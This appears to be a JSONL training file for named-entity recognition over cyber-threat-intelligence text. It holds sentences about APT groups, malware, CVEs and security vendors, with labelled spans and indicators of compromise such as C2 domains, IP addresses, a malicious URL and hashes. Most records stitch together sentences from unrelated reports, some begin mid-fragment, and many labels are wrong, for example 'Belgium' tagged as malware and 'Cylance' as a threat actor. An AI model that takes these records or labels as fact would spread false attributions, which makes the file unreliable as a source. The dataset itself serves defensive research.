{"text": "youlabuy [ . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary . In this article , we will analyse this evolution: at the beginning the malware was only an information stealer without remote administration , it moved from a single file malware to a dual file malware (an executable and a dynamic library ) , the malware has supported more and more features over the time , the decoy documents have become more and more advanced .", "spans": {"ORGANIZATION: DeepSight MATI team": [[17, 36]], "THREAT_ACTOR: Waterbug": [[176, 184]], "THREAT_ACTOR: group": [[213, 218]], "TOOL: dynamic library": [[514, 529]]}, "info": {"id": "cyberner_stix_train_004950", "source": "cyberner_stix_train"}}
{"text": "The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods . Dragos' data indicates XENOTIME remains active .", "spans": {"TOOL: ProjectSauron": [[24, 37]], "ORGANIZATION: Dragos'": [[257, 264]], "THREAT_ACTOR: XENOTIME": [[280, 288]]}, "info": {"id": "cyberner_stix_train_004951", "source": "cyberner_stix_train"}}
{"text": "Opening the attached “ Defence & Security 2018 Conference Agenda.docx ” file does not immediately run malicious code to exploit the system .", "spans": {"FILEPATH: Defence & Security 2018 Conference Agenda.docx": [[23, 69]]}, "info": {"id": "cyberner_stix_train_004952", "source": "cyberner_stix_train"}}
{"text": "To run its code in kernel mode in the most recent versions of operating systems , that have Driver Signature Enforcement , Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown .", "spans": {"TOOL: Slingshot": [[123, 132]], "THREAT_ACTOR: groups'": [[312, 319]], "ORGANIZATION: Chinese universities": [[332, 352]]}, "info": {"id": "cyberner_stix_train_004953", "source": "cyberner_stix_train"}}
{"text": "After successfully accessing the machine , the attacker deployed tools on the machine , spread laterally through the victim's network , and accessed the victim's OWA account .", "spans": {"TOOL: OWA": [[162, 165]]}, "info": {"id": "cyberner_stix_train_004954", "source": "cyberner_stix_train"}}
{"text": "Paying attention to the details of past attacks is also an important means of preparing for future attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_004955", "source": "cyberner_stix_train"}}
{"text": "At different times , we have seen three or more active variants using different approaches or targeting different carriers . It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries . This configuration info can be changed with a tool included in the ZxShell package . TANKTRAP is a utility written in PowerShell that utilizes Windows group policy to spread and launch a wiper .", "spans": {"ORGANIZATION: public sector agencies": [[212, 234]], "ORGANIZATION: telecommunications": [[239, 257]], "ORGANIZATION: high-technology industries": [[268, 294]], "MALWARE: ZxShell": [[364, 371]], "MALWARE: TANKTRAP": [[382, 390]]}, "info": {"id": "cyberner_stix_train_004956", "source": "cyberner_stix_train"}}
{"text": "In late October and early November 2018 , Unit 42 intercepted a series of weaponized documents that use a technique to load remote templates containing a malicious macro .", "spans": {"ORGANIZATION: Unit 42": [[42, 49]], "TOOL: malicious macro": [[154, 169]]}, "info": {"id": "cyberner_stix_train_004957", "source": "cyberner_stix_train"}}
{"text": "Of note , the callbacks were to PHP scripts that included / dad5 / in the URLs .", "spans": {}, "info": {"id": "cyberner_stix_train_004958", "source": "cyberner_stix_train"}}
{"text": "The ‘ Register ’ and ‘ Sign Up ’ links are broken and ‘ redirects ’ the user back to the login page . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"TOOL: Bankshot": [[102, 110]], "ORGANIZATION: Advanced Threat Research": [[193, 217]], "ORGANIZATION: financial organizations": [[286, 309]], "TOOL: emails": [[382, 388]], "FILEPATH: Microsoft Word attachment": [[396, 421]], "VULNERABILITY: CVE-2017-0199": [[454, 467]], "MALWARE: ZeroT Trojan": [[482, 494]], "MALWARE: PlugX Remote Access Trojan": [[526, 552]], "MALWARE: RAT": [[555, 558]]}, "info": {"id": "cyberner_stix_train_004959", "source": "cyberner_stix_train"}}
{"text": "During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations . Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": {"ORGANIZATION: companies": [[80, 89]], "ORGANIZATION: government organizations": [[142, 166]], "ORGANIZATION: Dragos'": [[183, 190]], "MALWARE: TRISIS": [[207, 213]]}, "info": {"id": "cyberner_stix_train_004960", "source": "cyberner_stix_train"}}
{"text": "What ’ s more , the numbering of Asacub versions is a continuation of the Smaps system . CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both . The zombie host initiates the scan — another routine from previous campaigns — but updated with a larger set of parameters and programmed to run in the background . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month ’s most active ransomware gang .", "spans": {"MALWARE: Asacub": [[33, 39]], "MALWARE: Smaps": [[74, 79]], "ORGANIZATION: CTU": [[89, 92]], "THREAT_ACTOR: Group-3390": [[130, 140]], "ORGANIZATION: U.S. defense": [[178, 190]], "ORGANIZATION: military capability": [[308, 327]], "THREAT_ACTOR: Cl0p": [[550, 554]], "THREAT_ACTOR: LockBit": [[602, 609]]}, "info": {"id": "cyberner_stix_train_004961", "source": "cyberner_stix_train"}}
{"text": "For example , this is how opcode 0x1A is implemented : The opcode should represent a JB ( Jump if below ) function , but it ’ s implemented through set carry ( STC ) instruction followed by a JMP into the dispatcher code that will verify the carry flag condition set by STC . We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound . Winnti : 44260a1dfd92922a621124640015160e621f32d5 https://dump.gxxservice.com/common/up/up_base.php . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": {"ORGANIZATION: government": [[342, 352]], "ORGANIZATION: energy": [[355, 361]], "ORGANIZATION: technology sectors": [[368, 386]], "THREAT_ACTOR: Winnti": [[413, 419]], "FILEPATH: 44260a1dfd92922a621124640015160e621f32d5": [[422, 462]], "URL: https://dump.gxxservice.com/common/up/up_base.php": [[463, 512]], "ORGANIZATION: FireEye": [[590, 597]], "TOOL: Cobalt Strike": [[659, 672]]}, "info": {"id": "cyberner_stix_train_004962", "source": "cyberner_stix_train"}}
{"text": "org : 173.252.207.71 , 173.252.205.36 , 173.252.205.37 , 173.252.205.64 . antivirus-groups.com : 74.82.166.205 , 204.74.215.58 . domain.rm6.org : 216.131.95.22 , 222.255.28.27 . anti-virus.sytes.net : 173.252.205.36 , 173.252.205.37 , 173.252.205.64 .", "spans": {"DOMAIN: org": [[0, 3]], "IP_ADDRESS: 173.252.207.71": [[6, 20]], "IP_ADDRESS: 173.252.205.36": [[23, 37], [201, 215]], "IP_ADDRESS: 173.252.205.37": [[40, 54], [218, 232]], "IP_ADDRESS: 173.252.205.64": [[57, 71], [235, 249]], "DOMAIN: antivirus-groups.com": [[74, 94]], "IP_ADDRESS: 74.82.166.205": [[97, 110]], "IP_ADDRESS: 204.74.215.58": [[113, 126]], "DOMAIN: domain.rm6.org": [[129, 143]], "IP_ADDRESS: 216.131.95.22": [[146, 159]], "IP_ADDRESS: 222.255.28.27": [[162, 175]], "DOMAIN: anti-virus.sytes.net": [[178, 198]]}, "info": {"id": "cyberner_stix_train_004963", "source": "cyberner_stix_train"}}
{"text": "APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "ORGANIZATION: payment services": [[19, 35]], "ORGANIZATION: Kaspersky Lab": [[142, 155]]}, "info": {"id": "cyberner_stix_train_004964", "source": "cyberner_stix_train"}}
{"text": "Stolen data is stored in external storage under the /DCIM/ directory with a hidden sub-directory named \" .dat '' . One hour later , Bemstour was used against an educational institution in Belgium . Sandworm Team targets mainly Ukrainian entities associated with energy , industrial control systems , SCADA , government , and media .", "spans": {"MALWARE: Bemstour": [[132, 140]], "MALWARE: Belgium": [[188, 195]], "THREAT_ACTOR: Sandworm Team": [[198, 211]]}, "info": {"id": "cyberner_stix_train_004965", "source": "cyberner_stix_train"}}
{"text": "We also uncovered ViperRAT in a billiards game , an Israeli Love Songs player , and a Move To iOS app . We identified several European governments and defense companies compromised with this group . There are minor differences between the ZxShell implementation of this command and the original Windows one . Figure 6 : “ lun.vbs ” contents", "spans": {"MALWARE: ViperRAT": [[18, 26]], "SYSTEM: iOS": [[94, 97]], "ORGANIZATION: European governments": [[126, 146]], "ORGANIZATION: defense companies": [[151, 168]], "MALWARE: ZxShell": [[239, 246]], "SYSTEM: Windows": [[295, 302]]}, "info": {"id": "cyberner_stix_train_004966", "source": "cyberner_stix_train"}}
{"text": "Like FakeDefender and DataLust , Charger could be an indicator of a wider effort by mobile malware developers to catch up with their PC ransomware cousins . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . What is interesting , in some emails , they ask targets to phone them if they have any questions , like the FIN7 guys do . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": {"MALWARE: FakeDefender": [[5, 17]], "MALWARE: DataLust": [[22, 30]], "MALWARE: Charger": [[33, 40]], "TOOL: Perl IRC bot": [[217, 229]], "TOOL: public IRC chats": [[234, 250]], "TOOL: emails": [[302, 308]], "THREAT_ACTOR: FIN7": [[380, 384]], "THREAT_ACTOR: XSS attacks": [[421, 432]], "SYSTEM: CSP": [[435, 438]]}, "info": {"id": "cyberner_stix_train_004967", "source": "cyberner_stix_train"}}
{"text": "It detects and blocks this threat at the initial level of the attack cycle when the malicious macro attempts to invoke the first stage PowerShell payload .", "spans": {"TOOL: PowerShell": [[135, 145]]}, "info": {"id": "cyberner_stix_train_004968", "source": "cyberner_stix_train"}}
{"text": "These attacks are only becoming more common , with one third of all malware now targeting mobile endpoints . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 .", "spans": {"MALWARE: RTF attachments": [[153, 168]], "VULNERABILITY: CVE-2017-0199": [[233, 246]], "THREAT_ACTOR: APT10": [[249, 254], [469, 474]], "MALWARE: Poison Ivy malware family": [[277, 302]], "ORGANIZATION: FireEye": [[316, 323]], "THREAT_ACTOR: actors": [[450, 456]]}, "info": {"id": "cyberner_stix_train_004969", "source": "cyberner_stix_train"}}
{"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 .", "spans": {"MALWARE: AutoHotKey scripts": [[66, 84]], "ORGANIZATION: Rapid7": [[137, 143]], "FILEPATH: Dropbox": [[229, 236]], "TOOL: C2": [[244, 246]]}, "info": {"id": "cyberner_stix_train_004970", "source": "cyberner_stix_train"}}
{"text": "The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158 , CVE-2010-3333 and CVE-2009-3129 . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": {"SYSTEM: Windows": [[34, 41], [402, 409]], "SYSTEM: Word": [[59, 63]], "VULNERABILITY: CVE-2012-0158": [[115, 128]], "VULNERABILITY: CVE-2010-3333": [[131, 144]], "VULNERABILITY: CVE-2009-3129": [[149, 162]], "TOOL: decoy documents": [[169, 184]], "VULNERABILITY: InPage exploits": [[197, 212]], "ORGANIZATION: politically": [[255, 266]], "ORGANIZATION: militarily": [[270, 280]], "THREAT_ACTOR: Night Dragon": [[293, 305]], "ORGANIZATION: social engineering": [[331, 349]], "ORGANIZATION: Microsoft": [[392, 401], [446, 455]], "MALWARE: remote administration tools": [[502, 529]], "MALWARE: RATs": [[532, 536]], "ORGANIZATION: oil and gas": [[661, 672]]}, "info": {"id": "cyberner_stix_train_004971", "source": "cyberner_stix_train"}}
{"text": "So , what can you do to protect yourself from this stealthy beast ? One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts , sometimes coupled with social engineering tactics .", "spans": {"VULNERABILITY: zero-day vulnerability": [[99, 121]], "ORGANIZATION: Symantec": [[152, 160]], "THREAT_ACTOR: APT34": [[163, 168]], "MALWARE: public and non-public tools": [[183, 210]], "MALWARE: compromised accounts": [[262, 282]]}, "info": {"id": "cyberner_stix_train_004972", "source": "cyberner_stix_train"}}
{"text": "Further assets are decrypted and deployed , including another Dalvik DEX code file , which has various capabilities including registering itself as the incoming SMS handler for the device to intercept SMS messages , loading another ELF library that includes a version of BusyBox - a package containing various stripped-down Unix tools useful for administering such systems – and , interestingly , is capable of turning off the sound played when the device ’ s cameras take pictures . Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers . Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder .", "spans": {"SYSTEM: BusyBox": [[271, 278]], "THREAT_ACTOR: APT41's": [[541, 548]], "THREAT_ACTOR: APT28": [[771, 776]], "MALWARE: Responder": [[786, 795]]}, "info": {"id": "cyberner_stix_train_004973", "source": "cyberner_stix_train"}}
{"text": "The tweet stated that TrickBot , a well-known banking Trojan owned by an organized cybercrime gang , uses man-in-the-browser ( MITB ) web injects in online banking sessions to ask infected users for their mobile phone number and device type . Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . APT34 are involved in long-term cyber espionage operations largely focused on the Middle East .", "spans": {"MALWARE: TrickBot": [[22, 30]], "THREAT_ACTOR: ‘Operation Sheep’": [[250, 267]], "VULNERABILITY: Man-in-the-Disk": [[366, 381]], "THREAT_ACTOR: APT34": [[449, 454]]}, "info": {"id": "cyberner_stix_train_004974", "source": "cyberner_stix_train"}}
{"text": "] website updatemobapp [ . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government . Send exfiltrated data, taskkill.exe Ends working cycle of . Dubbing the threat actor TunnelVision , whose TTPs overlap with those of Charming Kitten and Phosphorus , the researchers observed that the group is characterized by the wide exploitation of oneday vulnerabilities in specific regions .", "spans": {"ORGANIZATION: FireEye 's Advanced Practices": [[44, 73]], "THREAT_ACTOR: APT33": [[180, 185]], "FILEPATH: taskkill.exe": [[263, 275]], "THREAT_ACTOR: TunnelVision": [[325, 337]], "THREAT_ACTOR: Charming Kitten": [[373, 388]], "THREAT_ACTOR: Phosphorus": [[393, 403]]}, "info": {"id": "cyberner_stix_train_004975", "source": "cyberner_stix_train"}}
{"text": "The code snippet below shows part of the screen parsing process . This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users . Today , FireEye released Indicators of Compromise ( IOCs ) for BLACKCOFFEE and Microsoft released signatures for its anti-malware products . The MiniDuke attackers are still active at this time and have created malware as recently as February 20 , 2013 .", "spans": {"ORGANIZATION: FireEye": [[204, 211]], "MALWARE: BLACKCOFFEE": [[259, 270]], "ORGANIZATION: Microsoft": [[275, 284]], "THREAT_ACTOR: MiniDuke attackers": [[341, 359]]}, "info": {"id": "cyberner_stix_train_004976", "source": "cyberner_stix_train"}}
{"text": "Dragos ’ data indicates XENOTIME remains active .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[24, 32]]}, "info": {"id": "cyberner_stix_train_004977", "source": "cyberner_stix_train"}}
{"text": "However , the director created a new organization in Cyprus named LokD . In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash . emails from spoofed senders were usually sent via mail servers in the United States and China . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": {"ORGANIZATION: LokD": [[66, 70]], "TOOL: emails": [[213, 219]], "ORGANIZATION: Malwarebytes 's": [[309, 324]], "MALWARE: NetSupport RAT": [[390, 404]]}, "info": {"id": "cyberner_stix_train_004978", "source": "cyberner_stix_train"}}
{"text": "Kaspersky believes both Shamoon and StoneDrill groups are aligned in their interests , but are two separate actors , which might also indicate two different groups working together . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Shamoon": [[24, 31]], "THREAT_ACTOR: StoneDrill": [[36, 46]], "FILEPATH: MSIL dropper": [[254, 266]], "ORGANIZATION: Proofpoint": [[293, 303]]}, "info": {"id": "cyberner_stix_train_004979", "source": "cyberner_stix_train"}}
{"text": "However , Talos has identified that was used at least since November 2018 . MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 . OceanLotus : enum.arkoorr.com:8888 11b4 . The leaked Biderman emails show that Harrison made good on his threats , and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti - Semitic language .", "spans": {"ORGANIZATION: Talos": [[10, 15]], "ORGANIZATION: MSPs": [[76, 80]], "THREAT_ACTOR: threat actors": [[143, 156]], "THREAT_ACTOR: APT10": [[165, 170]], "THREAT_ACTOR: OceanLotus": [[173, 183]], "DOMAIN: enum.arkoorr.com:8888": [[186, 207]], "THREAT_ACTOR: Harrison": [[252, 260], [325, 333]], "ORGANIZATION: Biderman": [[350, 358]], "ORGANIZATION: Ashley Madison executives": [[369, 394]]}, "info": {"id": "cyberner_stix_train_004980", "source": "cyberner_stix_train"}}
{"text": "In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . We can observe that the sample is very recent , created on Thursday , July 4", "spans": {"THREAT_ACTOR: Emissary Panda": [[218, 232]], "FILEPATH: sample": [[267, 273]]}, "info": {"id": "cyberner_stix_train_004981", "source": "cyberner_stix_train"}}
{"text": "the file specified by the C & C server Deldatall8 Delete all files stored in the /sdcard/DCIM/.dat/ directory We do n't have the space to cover all of the commands , but let 's take a look at some of the major ones . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . Silence is a financially motivated threat actor targeting financial institutions in different countries .", "spans": {"MALWARE: Bemstour": [[217, 225]], "THREAT_ACTOR: Silence": [[307, 314]]}, "info": {"id": "cyberner_stix_train_004982", "source": "cyberner_stix_train"}}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": {"ORGANIZATION: government officials": [[28, 48]], "MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "VULNERABILITY: CVE-2013-5065": [[244, 257]], "TOOL: EoP": [[258, 261]], "VULNERABILITY: exploit": [[262, 269]]}, "info": {"id": "cyberner_stix_train_004983", "source": "cyberner_stix_train"}}
{"text": "We are continuing to watch it closely . Kessem . Once installed , APT1 intruders have the option to tell victim systems to download and execute additional malicious software of their choice . The cryptographic certificates have also been exploited in attacks that have hit companies in the aerospace industry .", "spans": {"ORGANIZATION: Kessem": [[40, 46]], "THREAT_ACTOR: APT1": [[66, 70]], "SYSTEM: The cryptographic certificates": [[192, 222]], "ORGANIZATION: aerospace industry": [[290, 308]]}, "info": {"id": "cyberner_stix_train_004984", "source": "cyberner_stix_train"}}
{"text": "TA505 primarily distributed GlobeImposter in zipped script attachments through the beginning of September 2017 .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: GlobeImposter": [[28, 41]], "TOOL: zipped": [[45, 51]]}, "info": {"id": "cyberner_stix_train_004985", "source": "cyberner_stix_train"}}
{"text": "Some detection mechanisms and sandboxes may whitelist such package names , in an effort to prevent wasting resources . APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products .", "spans": {"THREAT_ACTOR: APT19": [[119, 124]], "MALWARE: Microsoft Excel files": [[176, 197]], "ORGANIZATION: AMP Threat Grid": [[234, 249]], "ORGANIZATION: Cisco Security": [[314, 328]]}, "info": {"id": "cyberner_stix_train_004986", "source": "cyberner_stix_train"}}
{"text": "\" I tried reaching out to Adups and never heard back , '' Strazzere tells Information Security Media Group . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . Datper : 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849 .", "spans": {"ORGANIZATION: Adups": [[26, 31]], "ORGANIZATION: Information Security Media Group": [[74, 106]], "ORGANIZATION: Anomali": [[109, 116]], "MALWARE: ITW": [[195, 198]], "VULNERABILITY: CVE-2018-0798": [[226, 239]], "MALWARE: Datper": [[242, 248]], "FILEPATH: 7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849": [[251, 315]]}, "info": {"id": "cyberner_stix_train_004987", "source": "cyberner_stix_train"}}
{"text": "While the Dumpert tool is meant to help red teams emulate an adversary , we had not seen this tool used by threat actors until it was uploaded to this related webshell on September 23 , 2019 .", "spans": {"TOOL: Dumpert": [[10, 17]]}, "info": {"id": "cyberner_stix_train_004988", "source": "cyberner_stix_train"}}
{"text": "After thorough analysis , ESET researchers are highly confident that this campaign is run by the OceanLotus group , also known as APT32 and APT-C-00 . The malware may inject itself into browser processes and explorer.exe .", "spans": {"ORGANIZATION: ESET": [[26, 30]], "THREAT_ACTOR: OceanLotus": [[97, 107]], "THREAT_ACTOR: APT32": [[130, 135]], "THREAT_ACTOR: APT-C-00": [[140, 148]], "MALWARE: malware": [[155, 162]], "FILEPATH: explorer.exe": [[208, 220]]}, "info": {"id": "cyberner_stix_train_004989", "source": "cyberner_stix_train"}}
{"text": "FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file .", "spans": {"ORGANIZATION: FireEye iSIGHT Intelligence": [[0, 27]], "THREAT_ACTOR: APT37": [[74, 79]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[92, 126]], "VULNERABILITY: CVE-2018-4878": [[129, 142]], "TOOL: DOGCALL malware": [[159, 174]], "THREAT_ACTOR: Turla": [[201, 206]], "MALWARE: encrypted container": [[219, 238]]}, "info": {"id": "cyberner_stix_train_004990", "source": "cyberner_stix_train"}}
{"text": "Tensions Between Hamas and the Egyptian Government : Egypt plays a major role as a mediator in the Israeli-Palestinian confict and has brokered several ceasefire deals and other negotiations in the past .", "spans": {"ORGANIZATION: Hamas": [[17, 22]]}, "info": {"id": "cyberner_stix_train_004991", "source": "cyberner_stix_train"}}
{"text": "In a previous execution ( published in June 2019 ) , we observed that dota2 had its own folder but it was hardly executed .", "spans": {"TOOL: dota2": [[70, 75]]}, "info": {"id": "cyberner_stix_train_004992", "source": "cyberner_stix_train"}}
{"text": "This version of the module does not rely on an external transport DLL for communicating with its C2 servers ; instead it directly uses Wininet API functions .", "spans": {"TOOL: DLL": [[66, 69]], "TOOL: C2": [[97, 99]], "TOOL: Wininet": [[135, 142]]}, "info": {"id": "cyberner_stix_train_004993", "source": "cyberner_stix_train"}}
{"text": "The data that Domestic Kitten steals follows a similar format with Bouncing Golf ’ s , with each type of data having a unique identifying character . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . Given FIN7 ’s previous use of false security companies , we decided to look deeper into this one . Adversaries may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"MALWARE: Domestic Kitten": [[14, 29]], "MALWARE: Bouncing Golf": [[67, 80]], "VULNERABILITY: zero day": [[232, 240]], "VULNERABILITY: CVE-2016-4171": [[241, 254]], "THREAT_ACTOR: FIN7": [[263, 267]], "THREAT_ACTOR: Adversaries": [[356, 367]]}, "info": {"id": "cyberner_stix_train_004994", "source": "cyberner_stix_train"}}
{"text": "Some BRONZE PRESIDENT C2 domains analyzed by CTU researchers were hosted on infrastructure owned by Dutch VPS provider Host Sailor , Hong Kong-based New World Telecoms , and Malaysia-based Shinjiru Technology ( see Figure 7 ) .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[5, 21]], "TOOL: C2": [[22, 24]], "ORGANIZATION: CTU": [[45, 48]], "TOOL: VPS": [[106, 109]]}, "info": {"id": "cyberner_stix_train_004995", "source": "cyberner_stix_train"}}
{"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 .", "spans": {"MALWARE: Okrum": [[52, 57]], "VULNERABILITY: exploit": [[276, 283]], "FILEPATH: ITW": [[284, 287]], "TOOL: (VirusTotal": [[400, 411]], "TOOL: RTF": [[447, 450]]}, "info": {"id": "cyberner_stix_train_004996", "source": "cyberner_stix_train"}}
{"text": "For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke , that were purposely designed to leave a persistent backdoor on the compromised network .", "spans": {"MALWARE: CozyDuke": [[10, 18]], "THREAT_ACTOR: Dukes": [[43, 48]], "MALWARE: SeaDuke": [[111, 118]], "MALWARE: HammerDuke": [[123, 133]]}, "info": {"id": "cyberner_stix_train_004997", "source": "cyberner_stix_train"}}
{"text": "In this case , we had observed the Sofacy group registering new domains , then placing a default landing page which they then used repeatedly over the course of the year .", "spans": {"THREAT_ACTOR: Sofacy": [[35, 41]]}, "info": {"id": "cyberner_stix_train_004999", "source": "cyberner_stix_train"}}
{"text": "The version we found was built at the beginning of 2017 , and at the moment we are not sure whether this implant has been used in the wild . Trend Micro™ Deep Discovery™ provides detection , in-depth analysis , and proactive response to today’s stealthy malware , and targeted attacks in real time . One of the alleged leaders was arrested in Spain in early 2018 , but the group still appears to be active .", "spans": {"ORGANIZATION: Trend Micro™": [[141, 153]], "THREAT_ACTOR: attacks": [[277, 284]]}, "info": {"id": "cyberner_stix_train_005000", "source": "cyberner_stix_train"}}
{"text": "Despite the shared history of the name itself however , it is important to note that there is no reason to believe that the Duke toolsets themselves are in any way related to the ItaDuke malware , or to Duqu for that matter .", "spans": {"THREAT_ACTOR: Duke": [[124, 128]], "MALWARE: ItaDuke": [[179, 186]], "MALWARE: Duqu": [[203, 207]]}, "info": {"id": "cyberner_stix_train_005001", "source": "cyberner_stix_train"}}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . It's unclear how Cadelle infects its targets with Backdoor.Cadelspy .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: specific individuals": [[82, 102]], "VULNERABILITY: zero-day exploits": [[143, 160]], "MALWARE: Backdoor.Cadelspy": [[252, 269]]}, "info": {"id": "cyberner_stix_train_005002", "source": "cyberner_stix_train"}}
{"text": "It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations . XENOTIME is easily the most dangerous threat activity publicly known .", "spans": {"THREAT_ACTOR: attackers": [[56, 65]], "TOOL: Naikon proxies": [[73, 87]], "THREAT_ACTOR: XENOTIME": [[236, 244]]}, "info": {"id": "cyberner_stix_train_005003", "source": "cyberner_stix_train"}}
{"text": "Ensure error messages are generic and do not expose too much information .", "spans": {}, "info": {"id": "cyberner_stix_train_005004", "source": "cyberner_stix_train"}}
{"text": "Use of malware that is capable of spying on infected systems .", "spans": {}, "info": {"id": "cyberner_stix_train_005005", "source": "cyberner_stix_train"}}
{"text": "Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"MALWARE: Previous versions": [[0, 17]], "ORGANIZATION: Kaspersky": [[36, 45]], "THREAT_ACTOR: Cylance": [[58, 65]], "ORGANIZATION: Trend Micro": [[90, 101]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[135, 154]]}, "info": {"id": "cyberner_stix_train_005006", "source": "cyberner_stix_train"}}
